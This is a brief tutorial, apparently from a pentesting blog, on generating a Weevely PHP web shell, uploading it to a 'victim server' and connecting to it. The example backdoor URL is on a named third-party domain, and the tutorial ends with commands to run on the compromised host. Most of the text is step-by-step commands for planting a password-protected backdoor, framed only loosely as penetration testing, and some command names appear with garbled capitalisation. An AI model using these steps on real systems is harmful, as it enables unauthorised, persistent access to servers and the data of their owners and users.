How to Create a Backdoor in Server using BackTrack (Weevely Tutorial)

Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application testing post exploitation, and can be used as a stealth backdoor web shell to manage legit web accounts, even free hosted ones. It is currently included in Backtrack and Backbox and other Linux distributions for penetration testing.

Open your backtrack terminal and type cd /pentest/backdoors/web/weevely

 

Now type ./weevely.py generate <password> <location, where u want to save file> .It will look something like this

. / weevely.py generate rajchandel (Password) /root/Desktop

Then upload that file in victim server, after uploading it, copy the URL of your uploaded file. Then type ./weevely.py <url> <password> .It will look something like this

. / weevely http://telecallerjobs.com/webdoor.php rajchandel

 

Uname –a – print all information

Free – display information about free and used memory on the system

pwd – print name of current/working directory

Df – displays the amount of disk space available on the filesystem containing each file name argument

W – Displays information about the users currently on the machine, and their processes

Ls – List information about the FILEs (the current directory by default)

Leave a Reply

Your email address will not be published. Required fields are marked *